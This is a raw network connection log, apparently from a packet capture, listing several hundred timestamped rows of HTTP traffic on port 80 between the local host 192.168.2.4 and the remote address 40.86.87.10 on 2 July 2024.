Jul 2, 2024 07:31:09.853503942 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.853517056 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.853526115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.853538990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.853549957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.853557110 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.853560925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.853570938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.853581905 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.853581905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.853594065 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.853610992 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.853610992 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.853621960 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.853631973 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.853634119 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.853645086 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.853657007 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.853661060 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.853667974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.853671074 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.853679895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.853691101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.853702068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.853708029 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.853713036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.853733063 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.853749037 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.854444027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.854455948 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.854465961 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.854477882 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.854487896 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.854499102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.854501963 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.854510069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.854516983 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.854521036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.854532003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.854536057 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.854543924 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.854554892 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.854554892 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.854567051 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.854578018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.854578972 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.854588032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.854598045 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.854609013 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.854609966 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.854619980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.854631901 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.854634047 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.854643106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.854650974 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.854664087 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.854693890 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.855226994 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.855276108 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.855293989 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.855304956 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.855315924 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.855315924 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.855328083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.855338097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.855340004 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.855349064 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.855355978 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.855360985 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.855371952 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.855381012 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.855386019 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.855413914 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.855432034 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.857636929 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.857685089 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.857718945 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.857731104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.857762098 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.857773066 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.857805014 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.857816935 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.857830048 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.857841969 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.857842922 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.857853889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.857858896 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.857876062 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.857897997 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.858063936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858076096 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858087063 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858098030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858109951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858114004 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.858120918 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858131886 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858139038 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.858156919 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.858177900 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.858357906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858370066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858408928 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.858500957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858514071 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858525038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858536959 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858547926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858549118 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.858560085 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858563900 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.858571053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858582020 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858588934 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.858593941 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858606100 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858616114 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.858622074 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.858635902 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.858656883 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.858995914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859006882 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859016895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859028101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859039068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859040976 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.859050035 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859061003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859071970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859075069 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.859082937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859090090 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.859093904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859106064 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859111071 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.859117031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859137058 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.859165907 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.859503031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859514952 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859524965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859536886 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859549999 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.859554052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859564066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859570026 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.859575033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859580994 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.859586000 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859596968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859606981 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859613895 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.859618902 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859628916 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859641075 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.859641075 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.859658957 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.859677076 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.860265017 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860275984 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860286951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860316992 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.860347033 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.860373020 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860384941 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860394955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860405922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860418081 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.860444069 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.860542059 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860553026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860563993 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860588074 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.860599041 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.860716105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860727072 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860738993 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860755920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860760927 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.860768080 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860779047 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860789061 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.860790968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860801935 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860805988 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.860814095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860824108 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860835075 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.860836029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.860861063 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.860878944 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.861304998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861316919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861335039 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861345053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861356974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861356974 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.861368895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861380100 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861383915 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.861392021 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861398935 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.861403942 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861413956 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861418009 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.861426115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861437082 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861448050 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861449003 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.861459970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861470938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861478090 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.861483097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861499071 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861501932 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.861511946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861519098 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.861525059 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861536980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.861541986 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.861562967 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.861582994 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.862217903 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862229109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862246037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862256050 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862267971 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862271070 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.862281084 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862292051 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862297058 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.862303019 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862310886 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.862313986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862324953 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862335920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862345934 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862358093 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862361908 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.862369061 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862375975 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.862385988 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862390041 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.862396955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862404108 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862409115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862413883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862418890 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.862421989 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862427950 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.862453938 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.862483025 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.863444090 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863461018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863471985 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863483906 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863493919 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.863495111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863506079 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863516092 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863524914 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.863527060 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863538027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863548994 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863557100 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.863559008 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863570929 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863579035 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.863583088 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863594055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863596916 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.863604069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863606930 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.863620996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863634109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863635063 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.863646030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863656044 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863662958 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.863668919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863679886 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.863681078 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.863691092 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.863718033 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.864485979 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.864515066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.864526987 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.864530087 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.864551067 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.864568949 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.864615917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.864628077 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.864639997 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.864654064 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.864666939 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.864689112 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.864921093 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.864933014 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.864943981 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.864954948 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.864965916 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.864968061 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.864974976 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.864986897 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.864993095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.864995956 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.865004063 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.865046978 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.865293980 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.865304947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.865315914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.865326881 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.865336895 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.865339041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.865350962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.865350962 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.865361929 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.865374088 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.865380049 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.865390062 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.865400076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.865408897 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.865413904 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.865417957 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.865422964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.865437984 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.865468025 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.865698099 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.865732908 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.865767956 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.865804911 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:09.865833044 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:09.865844965 CEST	80	49730	40.86.87.10	192.168.2.4
